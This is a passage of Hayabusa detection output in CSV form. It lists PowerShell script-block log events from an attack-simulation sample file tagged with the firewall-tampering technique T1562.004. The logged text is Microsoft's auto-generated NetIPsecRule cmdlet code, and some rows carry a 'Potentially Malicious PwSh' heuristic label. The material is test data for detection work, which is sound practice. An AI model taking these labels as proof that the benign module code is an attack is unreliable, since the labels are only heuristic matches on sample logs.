(@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters,",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 